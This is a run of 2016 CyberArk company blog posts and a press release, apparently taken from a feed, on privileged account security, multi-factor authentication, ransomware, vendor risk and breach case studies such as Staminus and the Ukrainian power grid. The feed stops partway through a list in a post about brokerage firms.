PCI DSS is a global standard focused on protecting cardholder data. Extending the standard to require multi-factor authentication for privileged users who are responsible for securing, managing and accessing the databases, servers and applications that contain sensitive cardholder data is a good move.

It’s no secret that attackers seek privileged accounts in order to gain access to sensitive, confidential information. This is how they successfully accomplish their mission. We’ve seen many regulations and standards add and expand controls that require organizations to protect access to privileged accounts, secure and monitor usage of these sensitive accounts and identify suspicious privileged activity.

After reviewing the full text of the updated PCI DSS requirement 8.3 “Secure all individual non-console administrative access and all remote access to the CDE using multi-factor authentication,” it’s clear that the PCI Security Standards Council has outlined two options for organizations to meet this requirement. The first option is to enforce MFA at the point of access to the CDE. The second option is to enforce MFA at every individual system and application within the CDE.

Rolling out MFA across every individual system and application can be challenging – deploying, integrating and managing that architecture would be time-consuming, and most likely, headache-inducing. The easier and more secure method is to enforce MFA at the point of access to the CDE. This is exactly what CyberArk has been doing for years to help organizations secure privileged access to sensitive data.

By implementing MFA at the network level, it’s not only easier to deploy and manage, but organizations also get additional security benefits. With a single point of entry for all privileged access to the CDE, organizations can control, isolate and monitor all administrative sessions. This is particularly important for remote users and third-party vendors accessing cardholder data environments – PCI 3.2 specifies that MFA is required for both internal and third-party access.

With this approach, CyberArk can help organizations to address the latest requirements in PCI 3.2 by enforcing MFA for administrators when they access the CyberArk solution. Through the CyberArk C3 Alliance, CyberArk has developed a number of out-of-the-box integrations to support a range of multi-factor authentication methods.

Read more about how CyberArk solutions help organizations address PCI standards here.

]]>
Video: How to Effectively Manage Local Admin Rights on Endpoints https://www.cyberark.com/blog/video-how-to-effectively-manage-local-admin-rights-on-endpoints/ Wed, 04 May 2016 07:57:27 +0000 https://www.cyberark.com/blog//

Facing a myriad of risks including the proliferation of malware and successful phishing, organizations continually look for ways to strengthen security and more effectively manage local admin rights on endpoints.

Finding the right balance is a challenge for organizations as they consider the best options to mitigate the risk of a breach. The goal is to reduce the attack surface without disrupting the authorized day-to-day tasks of business users. If an organization entirely removes local admin rights from users, then users are frequently prevented from accomplishing certain tasks necessary in their day-to-day jobs. This leads to frustrated end users, an overwhelmed support team and high help desk costs. If an organization allows users to maintain local admin rights, the machine, and the network by default, are open to a range of attacks.Given the tradeoffs, organizations often struggle with how to best balance security needs with productivity and usability requirements.

In a short video, CyberArk’s Lauren Horaist, senior product marketing manager, weighs the pros and cons of the options to manage local admin rights. She also explains how CyberArk Viewfinity enables organizations to enforce flexible least privilege policies for business and administrative users, as well as control what applications are allowed to run. Using CyberArk Viewfinity, organizations can revoke everyday local administrator privileges from business users while seamlessly elevating privileges when required by trusted applications.

 

Editor’s Note: CyberArk Viewfinity with enhanced protection is now CyberArk Endpoint Privilege Manager.

]]>
C³ Alliance Global Technology Partner Program: A Q&A with CyberArk’s Alliances Technology Expert https://www.cyberark.com/blog/c3-alliance-global-technology-partner-program-a-qa-with-cyberarks-alliances-technology-expert/ Tue, 03 May 2016 14:20:32 +0000 https://www.cyberark.com/blog//

The C3 Alliance Global Technology Partner Program brings together key enterprise and security software companies to deliver integrated, tested solutions to better protect our shared customers, making it easier to extend the power of privileged account security across an organization and enhance the overall security posture.

With the launch of the C3 Alliance, it’s a perfect time to learn more about how CyberArk works with partners to integrate technology with CyberArk’s Privileged Account Security Solution. Edward Nunez, an alliances technology expert on CyberArk’s Business Development team, knows this process well, so we asked him a few questions to better understand what’s involved.

How does CyberArk work with its partners to integrate technology?

Through the C3 Alliance, we work with partners to integrate a wide range of security products with the CyberArk Privileged Account Security solution. We provide access to CyberArk resources and expertise. This includes the tools, training resources, documentation and cloud-based environments they need to develop, test and enhance their offerings. We offer advice on best practices to ensure that the integration is developed with the highest security standards in mind. Not only do we provide our partners with the tools and resources needed to succeed, but we also provide support. For example, if they face challenges or need to troubleshoot any issues, we are there to help – whether it be to provide guidance directly or to identify internal resources that can address the problem.

Can you talk about the development phase? What’s typically involved?

We work closely with our partners – from the initial design phase through testing and certification – to ensure that the integrated technologies meet the requirements of our mutual customers and provide value-added solutions. We kick off the development process with an initial design phase, which involves a discussion with our partner on the planned architecture, integration details, etc. We then establish a regular review process to ensure the partner is fully supported along each step of the way. At the end of the development phase, we hold an in-depth demonstration and working session with our partner and our product managers for a quality assurance review and certification.

Do you have any advice to offer companies that want to join the C3 Alliance?

Yes, consider the role privileged account security plays in the incident response field and the different venues for integration offered by CyberArk. The options range from gaining access to detailed privileged activity data/alerts to securing and managing credentials via CyberArk.

Partners should also align with requests and feedback from the field to validate priorities. There are use cases where mutual customers have requested specific integrations to ensure access to credentials is secure. Some partners may start with securing and managing credentials for specific solutions and expand use cases from there. Considering the possibilities and feedback from the field is helpful as we brainstorm on the different use cases for integration with our partners. 

C3 Alliance members represent enterprise software, infrastructure and security solutions, including security information and event management (SIEM), identity and access governance, asset and vulnerability discovery, security management and authentication services that benefit from tighter integration with CyberArk for securing privileged accounts and using privileged data to detect and respond to threats.

We encourage companies interested in joining the C3 Alliance to contact us at Business_Development@cyberark.com to start exploring ideas and possible use cases for integration.

]]>
SSH Keys: The Overlooked Cyber Security Attack Vector https://www.cyberark.com/blog/ssh-keys-the-overlooked-cyber-security-attack-vector/ Thu, 28 Apr 2016 12:57:59 +0000 https://www.cyberark.com/blog//

In a recent CyberArk blog, we explored the critical role SSH keys play in establishing trust between systems, encrypting communication between such systems, and facilitating strong authentication and secure transactions. Despite the critical role SSH keys play, many organizations inadvertently ignore SSH key vulnerabilities and underestimate the prevalent use of SSH within an enterprise.

One particular area where SSH key security may be overlooked is within an organization’s Unix/Linux environment. Often accessed by privileged users outside of the security realm, these systems house some of an enterprise’s most sensitive assets – from databases and FTP servers to web and cloud applications. While many organizations take steps to protect the root user accounts on these systems, individual accounts and credentials – including SSH keys – used to gain root privileges are often overlooked by security teams. This can leave an organization vulnerable to both malicious and accidental damage to critical systems.

This infographic illustrates the powerful, privileged access SSH keys establish. You’ll also find actionable tips for mitigating risks of cyber attacks in Unix/Linux operating environments. To learn more about locking down SSH keys, please visit www.CyberArk.com/SSH for a library of free resources including a White Paper from IDC: Market Spotlight: Minimizing Cybersecurity Risk with Vigilant SSH Key Management.

SSH Infographic_4 26 16

]]>
Enterprise Software, IT Security and Services Providers Build on the Power of Privileged Account Security to Better Protect Customers from Cyber Threats https://www.cyberark.com/blog/enterprise-software-it-security-and-services-providers-build-on-the-power-of-privileged-account-security-to-better-protect-customers-from-cyber-threats/ Wed, 27 Apr 2016 12:33:33 +0000 https://www.cyberark.com/blog//

It’s widely known that 100% of advanced cyber attacks exploit privileged accounts. The number of privileged accounts in an organization is typically three-to-four times the number of employees. Privileged Accounts are found in every software and hardware solution – basically everything with an IP address also has a privileged account.

Given the significance of privileged credentials and the prevalence of them across an organization, IT, security managers and even application developers must scrutinize the following questions as part of a comprehensive security program:

  • Are all credentials used to access privileged accounts managed securely? (i.e. rotated based on security policies etc.)
  • Are privileged credentials used by different applications to access sensitive network resources secure?
  • Do we have a policy-driven approach to identity and access management across all users, ensuring the right users have the right privileges? (i.e. policies to avoid excess privileged permissions/ entitlement creep)
  • When an attacker breaches the network perimeter, how do we mitigate risk – to ensure they can’t move laterally and elevate privileges to gain access to sensitive resources?
  • Can our SIEM solution monitor and identify critical threats associated with privileged activities?

No matter where privileged credentials reside in an IT environment, they should be secured and managed. Moreover, privileged account activity data should be strategically utilized to protect an organization from the most advanced cyber threats. Companies cannot afford to have a myopic view of privileged account security. Likewise, enterprise software, IT security and services providers must collectively and strategically work together within an ecosystem to address the rapid and ongoing evolution of advanced cyber security threats.

Today CyberArk launched the C³ Alliance, our new Global Technology Partner Program. By partnering with best-of-breed enterprise software, IT security and services providers, we leverage our combined skills and expertise to offer solutions that enable our customers to better secure their environment while maximizing their existing security and IT investment particularly in the areas of proactive protection, detection and threat response.

For example, the CyberArk Privileged Account Security Solution can be used to secure and manage privileged credentials accessed by users as well as those used by a multitude of applications (see CyberArk Secured™). Further, customers can leverage CyberArk privileged account data to gain more valuable insights to detect, alert & rapidly respond to cyber attacks (see CyberArk Connected™).

The C³ Alliance features more than 30 certified partner integrations and more than 170 validated plug-ins, many derived from customer requirements. As a result, our mutual customers will be able to:

  • Automatically secure and manage privileged credentials, used by individuals or applications, across integrated solutions
  • Gain centralized, enterprise-wide, real-time visibility to monitor and identify critical security threats associated with privileged activity
  • Benefit from an integrated, policy-driven approach to identity and access governance across all users
  • Reduce complexity and time required to implement with pre-integrated, certified and tested solutions

We will continue to work hard to deliver innovative solutions with the C3 Alliance members. Additional information about our technology partners is available here.

C³ Alliance Program Overview

 

 

]]>
On-Premises or in the Cloud, Privileged Accounts Must be Protected https://www.cyberark.com/blog/on-premises-or-in-the-cloud-privileged-accounts-must-be-protected-2/ Thu, 21 Apr 2016 12:14:32 +0000 https://www.cyberark.com/blog//

Businesses continue to adopt a “cloud-first strategy” at an accelerated pace. Consider the following stats from IDC Research highlighted by the Wall Street Journal:

  • Worldwide spending on public cloud services is estimated to grow by a 19.4% compound annual rate over the next four years, to $141 billion in 2019, from $70 billion in 2015.
  • Over that period, businesses are expected to spend six times more on public cloud services than they do on overall information technology.
  • Software-as-a-Service will remain the dominant cloud tool used by businesses in the years ahead, attracting two thirds of total spending on public cloud.

As enterprise businesses increasingly shift technology applications and infrastructure to the cloud, privileged accounts in public, private and hybrid cloud environments grow exponentially.  No matter where they “live” – on-premises or in the cloud – privileged accounts need to be protected accounts.

Watch this 60-second video to learn how CyberArk Privileged Account Security can help IT and security teams overcome the challenges of managing these powerful accounts and secure cloud environments including Infrastructure-as-a-Service and Software-as-a-Service. Unique capabilities of the solution include credential protection, session security and continuous monitoring to deliver a layered approach to securing privileged accounts in the cloud.

 
]]>
Winner of CyberArk’s 2016 RSA Conference Booth Sweepstakes Announced https://www.cyberark.com/blog/winner-of-cyberarks-2016-rsa-conference-booth-sweepstakes-announced/ Mon, 18 Apr 2016 13:46:35 +0000 https://www.cyberark.com/blog//

Regular readers of the CyberArk blog know that this year’s RSA Conference was jam packed for our team with news of new products and innovation, exciting new initiatives with our partners and meetings with customers and prospects. We had a record number of attendees visit the CyberArk booth, seeking ways to mitigate risk and proactively protect against stolen privileged credentials, Kerberos attacks, malicious insiders, Golden Ticket attacks and Pass-the-Hash attacks.

We also invited conference attendees to enter a sweepstakes for this year’s booth prize.
We decided to try something different this year. Our booth sweepstakes offered a chance for one lucky person to win $10,000 to be donated to a charity of his or her choice. The idea was well-received, with many attendees commenting on the refreshing change from the usual conference giveaways.

Today, we are thrilled to announce our winner, Cathy Hammond. Cathy has chosen the American Cancer Society’s Relay for Life, a charity with a cause very near and dear to her heart.

Cathy explains, “I am a breast cancer survivor, and I know too many people whose lives have been touched by cancer. I can’t sit still and not take action against this disease that has hurt so many. That’s why I participate in the American Cancer Society Relay for Life. Relay For Life is my opportunity to celebrate loved ones who have won their battle against cancer, remember those no longer with us, and fight back against this disease that robs so many of so much. The money donated by CyberArk to Relay for Life will bring us one step closer to a world with less cancer and more birthdays.”

Thank you, Cathy, for sharing your story and for donating to the American Cancer Society, an important organization supporting cancer research, patient services, early detection, treatment and education.

]]>
Tough Lesson to Learn: Privileged Controls Must Be Part of the “Security 101 Checklist” https://www.cyberark.com/blog/tough-lesson-to-learn-privileged-controls-must-be-part-of-the-security-101-checklist/ Wed, 13 Apr 2016 08:08:25 +0000 https://www.cyberark.com/blog//

In March 2016, the cyber security community collectively winced when it was discovered that hackers breached the servers of DDoS protection firm Staminus and placed sensitive data online for the whole world to see.

The Staminus data breach occurred on March 10 after hackers gained access to the company’s back-end servers and reset the servers to their original, factory settings. This action resulted in the collapse of the complete network and the hackers then used Hastebin, an anonymous text sharing portal, to place the stolen information from Staminus’ database in public.

Staminus’ clients need to be aware of potential credit card issues and the need to reset all their account passwords. The leaked data also includes customer support tickets, server log data, chat logs and the source code of some of the company’s services.

The Staminus breach is a painful lesson that revealed several internal security flaws, such as unpatched systems, exposed telnet, credit card data stored in plaintext and the use of the same password for all root accounts. This is a stark reminder of what can happen when an organization doesn’t employ privileged controls as part of its basic security controls.

Privileged account security must be part of an organization’s “Security 101 Checklist.” Along with patching, firewalling, encrypting sensitive data, privileged credentials need to be unique, complex and rotated.

Effective protection requires implementing an automated process to change hard-coded or embedded passwords for scripts and service accounts, as well as enforcing a policy of “least privilege” that ensures users have only enough privileges required to do their job.

It’s been stated many times – it’s not a matter of if a breach will occur, it’s when. That’s why organizations must take a proactive and layered approach to mitigate risks.

CyberArk’s Director of Consulting Services Gerrit Lansing wrote an article last November highlighting a few best practices for locking down credentials “Proactive Preventive Measures or Remediation: Same Actions, Different Timing.” It’s worth a quick read for a reminder of basic best practices.

If you are just getting started, consider using our Discovery and Audit Tool to identify where privileged accounts exist within your organization and assess your risk profile.  Research from CyberArk Labs found that 88% of the networks scanned were found to be significantly susceptible to compromise through privileged account credential theft or abuse.

]]>
Service Providers: a Weak Link in an Organization’s Cyber Security Program? https://www.cyberark.com/blog/service-providers-a-weak-link-in-an-organizations-cyber-security-program-2/ Fri, 08 Apr 2016 13:26:53 +0000 https://www.cyberark.com/blog//

Vendor-related IT security is a well-documented concern within the cyber security industry. In exploring the main cyber security challenges with third-party vendors, a recent Mandiant report highlights several issues associated with attacks stemming from IT outsourcing (ITO).

According to the report, a compromised ITO service provider can enable an attacker to shortcut the Targeted Attack Lifecycle and execute an advanced attack. When an attacker infiltrates a targeted company’s network using the compromised ITO infrastructure, they have essentially skipped the first three phases of the lifecycle including the need to craft an exploit, like a spear phishing email.

“This shortcut allows the attackers to scale, improving efficiency and reducing efforts required to complete their missions…We expect this trend to continue until the cost of operating through outsourced service providers becomes too great for the attack groups to bear.”
M-Trends 2016

The Mandiant report also noted organizations are frequently in the dark with regard to the security capabilities of a vendor’s network. Often organizations struggle to answer the basic questions of a vendor’s security posture:

  • Do they have a security operations center?
  • Do they have encryption?
  • Have they ever experienced a breach?

Ideally, organizations should understand these and other questions before letting their vendors within their firewalls.

The problem of vendor security is so serious that the New York State Department of Financial Services (NYDFS) released a report focusing on potential cyber security vulnerabilities with banks’ third-party vendors.

According to the NYDFS, banks that rely on third-party vendors for a broad-range of services don’t often realize or account for the fact that those third-party firms often have access to a financial institution’s information technology systems, providing a potential point of entry for hackers.

Among other findings the NYDFS report uncovered that nearly 1 in 3 banks surveyed do not require their third-party vendors to notify them of cyber security breaches. NYDFS expects to move forward on regulations to strengthen cyber security standards for banks’ third-party vendors, but vendors and service providers across all industries need to do more to address the issues.

Despite these vendor-related cyber security issues, companies can mitigate the risks associated with a breach in a proactive and effective manner. Taking basic steps to protect and manage credentials used by third parties, and securing and monitoring remote vendor sessions, can go a long way in protecting target organizations without inconveniencing vendors. By implementing such controls, organizations will have better oversight of security and avoid slipshod or ineffective security practices associated with their service providers.

One key tip that the M-Trends 2016 report recommends with vendor security is to monitor the use of privileged accounts.

“Monitor the use of privileged accounts, including those associated with outsourced service providers. Attackers target privileged accounts such as local administrator, domain administrator, and service accounts.”

The bottom line for taking control of security within a vendor relationship is to avoid leaving the credentials under full control of the vendor or your own internal users for that matter.

Cyber Security as a Feature

Forward-looking service providers need to start thinking about security from a community perspective. Ideally, they will integrate a strong cyber security posture as a feature that is highlighted within their value proposition.

Cyber security is not traditionally at the core of vendor management and third-party offerings. However, there will be a tipping point where it’s expected that third-party organizations are more security focused. Ultimately they will prioritize security and highlight it as a key part of their service.

From the vendor’s perspective what does it mean to place value on cyber security? Vendors should, for example, start to focus on internal capabilities including Multi-Factor Authentication (MFA), data encryption, insider threat detection, and a cyber education and awareness platform to help thwart phishing and data breaches.

One way for vendors to integrate cyber security as a core competency is to partner with a security firm to improve their offering. Additionally, they can continue to educate their staff on the nuances of cyber security including common vulnerabilities and methods for defending data and networks.

Conclusion

Remote vendors and outsourced service providers are core to most businesses. From CRM systems and payment solutions, to hardware and operational technology, vendors impact or have access, whether direct or indirect, to systems that run businesses.

In order to mitigate the risks vendors introduce, these companies need to take the lead by offering cyber security programs at the core of their key features. In the meantime, organizations can also mitigate the risk by closely managing and securing vendor credentials, isolating and monitoring vendor sessions, and continuing to watch for and alert on suspicious activity.

]]>
Conjur Delivers Automated Access Management to Windows Platforms https://www.cyberark.com/blog/conjur-delivers-automated-access-management-to-windows-platforms/ Tue, 05 Apr 2016 12:06:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-delivers-automated-access-management-to-windows-platforms/  

Press Release:

Native .NET Libraries and Windows Remote Desktop Support Spans Microsoft Workloads in Cloud, Hybrid and PaaS Environments

WALTHAM, Mass.– April 5, 2016 – Conjur, Inc., provider of automated access management software, has released significant product enhancements for Microsoft® Windows® environments that addresses the growing customer requirements for building, managing and securing Windows workloads in cloud and hybrid cloud environments. Conjur’s Windows capabilities deliver a consolidated approach for access, control, authorization and audit for Windows resources and development environments.

Now, customers can seamlessly extend their on-premise datacenter operations to cloud services, leverage Microsoft Azure services and accelerate the .NET software development lifecycle while strengthening security practices.

Conjur’s new support for native Windows authentication and real-time application of authorization and permissions to dynamic virtual machines ensures an IT graceful migration.

“As we broaden our market adoption, the need for first class Microsoft Windows support is apparent, especially in hybrid and heterogeneous environments,” said Mitch Haile, Vice President of Products at Conjur. “We are excited to support both .NET native client APIs and Windows Remote Desktop Access Management for modern, highly automated IT environments.”

Conjur’s Window’s release incorporates support for:

  • Windows Remote Desktop Connector: Integrate Windows authentication for user login to Windows instances operating in cloud environments
  • Native .NET Client Library: Conjur’s new .NET client library is open source and available immediately.

“Conjur’s new native .NET libraries and Remote Desktop access to Microsoft Windows hosts in the cloud is a significant step forward in enabling automated infrastructure security,” says Dave Bechberger, Senior Architect at Expero Inc.

Through a centralized authorization service exposed through APIs, Conjur enables enterprises to apply a consistent set of policies for production, staging and test environment access throughout the entire software development cycle. These latest enhancements meet the requirements for the scalable, enterprise-grade secret management solution for organizations in highly regulated industries.

About Conjur

Conjur is preventive security for companies that are automating their IT systems, who need to control access, and need to demonstrate control.  For enterprises that need to protect their infrastructure, Conjur is the only solution with comprehensive identity and authorization for every cloud, VM, container, service, job and user. Conjur helps companies such as Netflix, Box, and Puppet Labs solve critical operational, compliance, and security challenges that originate in modern automated infrastructure. Headquartered in Waltham, Massachusetts, Conjur is funded by Avalon Partners and Amplify Partners. Visit www.conjur.net  and follow @conjurinc on Twitter.

PRContact:
Tracy Wemett
BroadPR
+1-617-868-5031
All trademarks recognized.

 

]]>
Minimize Ransomware Threats While Achieving Security and Productivity with Least Privilege and Application Control https://www.cyberark.com/blog/minimize-ransomware-threats-while-achieving-security-and-productivity-with-least-privilege-and-application-control/ Thu, 31 Mar 2016 16:48:33 +0000 https://www.cyberark.com/blog//

It’s hard to open a newspaper or scroll through daily headlines without seeing new reports of extortion and blackmail through the use of ransomware – a type of malicious software designed to prevent access to information on a computer system until a sum of money is paid. Once used largely by cyber criminals to target consumers for short change, ransomware attacks have escalated to the enterprise, with highly motivated adversaries targeting corporate networks with increasingly creative tactics. Recently, major news outlets including the BBC and New York Times were also hit by ransomware “malvertising” that demanded payment in Bitcoin to unlock user computers. According to The Guardian, the malware “was delivered through multiple ad networks and used a number of vulnerabilities, including a recently-patched flaw in Microsoft’s former Flash competitor Silverlight, which was discontinued in 2013.”

There are two types of ransomware attacks that organizations could experience. The first one is “standard” ransomware infecting user machines, which is the same ransomware that would infect a regular consumer at home. These attacks will be opportunistic and less damaging to organizations, which usually store the important information on dedicated servers and in databases out of reach of attackers, so that files on user machines can be fairly easily replaced.

The second type is far more dangerous. These ransomware attacks follow the same general attack pattern as targeted network attacks, but for a much different end goal. Instead of information theft, ransomware attackers seek to cause widespread havoc through mass infection and encryption of user data. To do this, attackers often seek out privileged accounts to hijack (both privileged user accounts and application accounts used by automated processes, services and applications), then exploit them to propagate the ransomware throughout the network.

An example of this is a recent attack that targeted three different Indian banks and a pharmaceutical company, resulting in millions of dollars in damage. The attacker infiltrated the networks of each company, hijacked the necessary privileged credentials, then escalated access to other computers via unprotected Remote Desktop Ports (RDPs). With access to a computer gained, the attacker downloaded the ransomware from a server and then started the encryption process. Without privileged access, the attacker’s mission could not have been accomplished.

Removing local privileges can help defend against ransomware attacks, however, it’s not necessarily enough. For example, CryptoLocker is an example of malware that encrypts data using standard user rights, so efforts to remove or restrict local administrative rights without additional security measures does not completely mitigate the risk. Additionally, because CryptoLocker encrypts (and renders unreadable) all files that a user has access to in a corporate environment, it has a devastating effect.

With increasing attention on ransomware, many organizations are focused on eliminating the threat of a ransomware infection. To effectively defend against such ransomware attacks, organizations must combine the principle of least privilege AND application control to reduce the attack surface and block their progression. This dual-pronged approach can prevent ransomware from entering an organization in four key ways:

  • It blocks untrusted applications
  • It restricts or denies access for unknown applications (such as CryptoLocker)
  • It continuously monitors applications entering the environment
  • It removes local admin privileges to block CryptoLocker from deleting the shadow copy command,
    • It enables security teams to restore encrypted files using shadow copy.

Organizations should look for flexible tools that automate the management of local administrator privileges and control of applications on endpoints and servers. This unique combination of least privilege and application control can help organizations reduce the attack surface, protect against threats that have made their way inside, and alert security teams to potential in-process attacks – all without halting user productivity or overwhelming IT security teams.

To learn more about minimizing ransomware threats while achieving security and productivity with least privilege and application control, download this free eBook.

]]>
The 5 Stages of Secrets Management Grief, And How to Prevail [Slideshare] https://www.cyberark.com/blog/the-5-stages-of-secrets-management-grief-and-how-to-prevail-slideshare/ Thu, 31 Mar 2016 14:45:00 +0000 https://cyberarkvx2.wpengine.com/blog/the-5-stages-of-secrets-management-grief-and-how-to-prevail-slideshare/  

Our VP, Josh Bregman, was lucky enough to attend and speak at Puppet Camps Dallas. You might be wondering, what exactly are Puppet Camps? Puppet Camps are one-day events where you can watch presentations delivered by prominent members of the community as well as connect with fellow Puppet users. We recently spoke with Grace Stillar, Events Marketing Coordinator at Puppet Labs. To learn more about Puppet Camps, check out our conversation with her.

Along with meeting with fantastic people, and handing out some swag, Josh spoke about The 5 Stages of Secrets Management Grief. He outlined the feelings of denial, anger, bargaining, depression, and acceptance and informed listeners how to power through them. Attendees learned how to maintain Puppet workflows while keeping secrets secure and risks at a minimum.

Josh’s presentation discusses best practices around:

  • Why moving to DevOps is good for security as well as the cultural and organizational challenges associated with the transition.
  • How your Puppet architecture affects you ability to protect access to sensitive information (secrets) like database password, API keys, and certificates.
  • How to integrate Conjur with Puppet to ensure a secure, scalable, and audited access to secrets.

 

 

]]>
Federal Agencies Sprint Towards Multi-Factor Authentication, but There Are Gaps to Address https://www.cyberark.com/blog/federal-agencies-sprint-towards-multi-factor-authentication-but-there-are-gaps-to-address/ Tue, 29 Mar 2016 12:32:13 +0000 https://www.cyberark.com/blog//

The need for stricter cyber security measures within federal, state and local governments is well documented from high-profile breaches including those within the U.S. Office of Personnel Management (OPM) and the Internal Revenue Service.

As part of a directive to better protect the integrity of federal networks, in June 2015, the U.S. Chief Information Officer Tony Scott launched a 30-day Cybersecurity Sprint requiring federal agencies to improve the security and resilience of their networks by tightening policies and practices for privileged users and credentials across networks. The focus on privileged account security, signaled a shift in security strategy for both public and private organizations – one that assumes attackers are already inside the enterprise.

Multi-factor authentication was among the requirements included in the Sprint. Specifically, the initiative required agencies to: “Dramatically accelerate implementation of multi-factor authentication, especially for privileged users. Intruders can easily steal or guess usernames/passwords and use them to gain access to Federal networks, systems, and data. Requiring the utilization of a Personal Identity Verification (PIV) card or alternative form of multi-factor authentication can significantly reduce the risk of adversaries penetrating Federal networks and systems.”

The implementation of multi-factor authentication solutions is a response to vulnerabilities associated with privileged account credentials. Privileged account credentials are used by cyber attackers in nearly 100% of attacks to reach their goals of successfully breaching networks. Privileged accounts and credentials include IT administrative credentials, default and hard-coded passwords, application backdoors and SSH keys.

To mitigate risks, proactive security controls are a must, and credentials have to be managed and appropriately protected with solutions like multi-factor authentication, but adoption is not an easy feat for government agencies.

Addressing the Challenges
Multi-factor authentication implementations come with several challenges and complexities. Fortunately, there are alternatives to consider. For example, in a recent FCW article, Deborah Golden, principal and Federal Cyber Risk Services leader at Deloitte & Touche, notes that federal agencies can consider a multi-tiered approach by:

  • Requiring PIV authentication where possible and rapidly implementing known technical solutions for environments that can support PIV.
  • Using other multi-factor authentication tokens, where available, to eliminate remaining password-enabled accounts.
  • Determining mid- and long-term infrastructure changes required to PIV-enable all privileged user accounts.

The use of PIV cards for multi-factor authentication has known limitations with its ability to secure accounts that do not natively support PIV cards. CyberArk, however, helps organizations to meet the mandated use of multi-factor authentication for all privileged accounts by enabling PIV card authentication to all systems and applications managed by the CyberArk Privileged Account Security Solution – even applications that can’t natively support public key infrastructure (PKI) or multi-factor authentication. This approach enables the organizations to work with their existing infrastructure and centrally add PIV card authentication.

To simplify the deployment of the solution while maintaining individual accountability, many organizations working with CyberArk leverage shared accounts managed by the solution instead of personal privileged accounts. Each user is provided PIV card-protected access to the shared accounts stored in the secure digital vault resulting in the identity being decoupled from the account and the ability for organizations to more easily manage user access while maintaining required visibility. The combination of shared accounts centrally stored in the CyberArk Privileged Account Security Solution and access protected with PIV cards with individual accountability helps organizations meet the mandate for multi-factor authentication without introducing undue burden. CyberArk supports a variety of multi-factor authentication technologies including PIV and CAC cards.

In addition to its consultation efforts, partnering with CyberArk provides access to additional solutions that help bolster cyber security strategies within the federal, state and local governments. For example, CyberArk SSH Key Manager securely stores, rotates and controls access to SSH keys to prevent unauthorized access to privileged accounts. Additionally CyberArk Privileged Session Manager secures, controls, and monitors privileged user access as well as activities for critical UNIX, Linux, and Windows- based systems, databases, and virtual machines.

For more information on security and compliance for federal agencies, visit CyberArk’s Federal solutions webpage.

]]>
Failure to Secure Privileged Accounts Means “Lights Out” https://www.cyberark.com/blog/failure-to-secure-privileged-accounts-means-lights-out/ Fri, 25 Mar 2016 17:55:24 +0000 https://www.cyberark.com/blog//

As more and more details about the attack on the Ukrainian power grid are published, the more it becomes clear this was one of the more sophisticated cyber-attacks in recent years and the first critical infrastructure attack to actually cause physical ramifications (resulting in a blackout for approximately 230,000 people).

The Ukrainian electric grid operators used strong cyber defenses in their power management networks, including firewalls and system logging controls. But as in many other attacks, the attackers were able to penetrate the network and cause serious damage by taking control of privileged account credentials.

A newly published post-mortem analysis from SANS, in conjunction with the North American Reliability Corporation (NERC)’s E-ISAC, confirms that the attack started as a spear-phishing attack that penetrated the corporate network and enabled the attackers to harvest user credentials. The stolen credentials included credentials for accessing the VPN service that grants remote access into its ICS/SCADA network.

The use of stolen credentials to remotely access critical ICS assets is the most common threat to power grids. This is exactly what the attackers were able to do. After using the VPN credentials, the attackers were able to access other critical systems and went as far as logging out the operators in the control center, effectively taking control of the company’s power substations.

The sophistication of the attack is evident by the multiple systems that were targeted and penetrated in the Ukrainian power grid. This takes a well-coordinated plan, as well as a thorough understanding of the network architecture. With the stolen privileged credentials, the attackers were able to gain this understanding by conducting reconnaissance on the network undetected for more than 6 months. They used this time to learn how to disable critical ICS operator workstations to prevent them from intervening and initiate contingency procedures.

Some of the steps taken in this attack include:

  • Disable primary and back-up power (UPS) to the control system, causing the control center to lose power.
  • Rewriting of the firmware on the serial-to-Ethernet convertors in the substations, preventing the control center from accessing them remotely.
  • Launching a telephone denial-of-service attack against the customer call centers, preventing the call center from receiving real reports on the blackout.
  • A malware by the name of KillDisk was used to wipe files from the control center computers and caused the computers to crash. This left the control center incapable of starting and quickly recovering from the attack.

This Dark Reading article delves into the new SANS analysis on how the attackers successfully took control of the industrial control systems across three regional power firms and successfully shut off the lights, and also explores some key lessons learned from the attack. It’s worth a read. And for additional reading and resources on mitigating cyber security risk and protecting the grid, I encourage you to check out the following blog posts:

]]>
Conjur to Speak at Puppet Camps Dallas https://www.cyberark.com/blog/conjur-to-speak-at-puppet-camps-dallas/ Wed, 16 Mar 2016 20:31:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-to-speak-at-puppet-camps-dallas/  

Heading to Dallas next week (3/22) for Puppet Camps? What a coincidence, so are we! Not only are we sponsoring Puppet Camps, but our VP, Josh Bregman, will be giving a talk on “The 5 Stages of Secrets Management Grief [And How To Prevail]”.

During his 30 minute session, Josh will be discussing the progression of the 5 typical emotions you feel when coming to terms with the sensitive data in your confirguration management system.  He will discuss the tools necessary to enable you to maintain your Puppet workflows while keeping your secrets management risks minimal.

Interested in Puppet Camps but not sure what to expect? We’ve got you covered with a sneak peek at all you can look to gain from these one day events.

If you are planning to attend Dallas, don’t forget to check out Josh’s talk, or ping him beforehand to meetup, he would love to talk to you! You can tweet him or send him an email at josh.bregman@cyberark.com.

 

]]>
Four Characteristics that make Brokerage Organizations Prime Cyber Security Targets https://www.cyberark.com/blog/four-characteristics-make-brokerage-organizations-prime-cyber-security-targets/ Mon, 14 Mar 2016 18:33:02 +0000 https://www.cyberark.com/blog//

If you talked to a brokerage leader 10 years ago, the conversation around cyber security usually focused on achieving compliance. Today, in order to mitigate the risk of attacks, compliance is the beginning, not the end.

It’s imperative to go well beyond compliance, and this is particularly true for online brokerage organizations.  Regardless of size, these organizations are natural targets for cyber attackers.  Online brokers focus on customer service, and this often extends to keeping usability, accuracy and speed at the core of their transactions. These elements are not only central to the business but also to their product.

Mixing this type of business model with an environment that is always-on and always moving sensitive, high-risk data around multiple systems, creates a high-value target for a cyber attacker.

The brokerage industry relies heavily on developers and technology analysts to streamline the customer experience, making sure that their brokerage products scale and provide the most accurate information. As a result, the industry has a larger than average IT support and development staff when compared to similar sized companies within other industries.

The operating environment that brokerage organizations typically embody creates the following cyber risks:

  1. Large IT Staff: The larger than average IT staff often results in larger than average access to high-risk, backend systems, applications and data. This access is available to a large array of teams and people, including developers and vendors. In order to do their job, this operational staff needs as much access as possible to make changes, patch, reboot a server, restart a service install software and more. This accessibility often leads to a greater chance for compromising high-risk data or stopping a critical service.
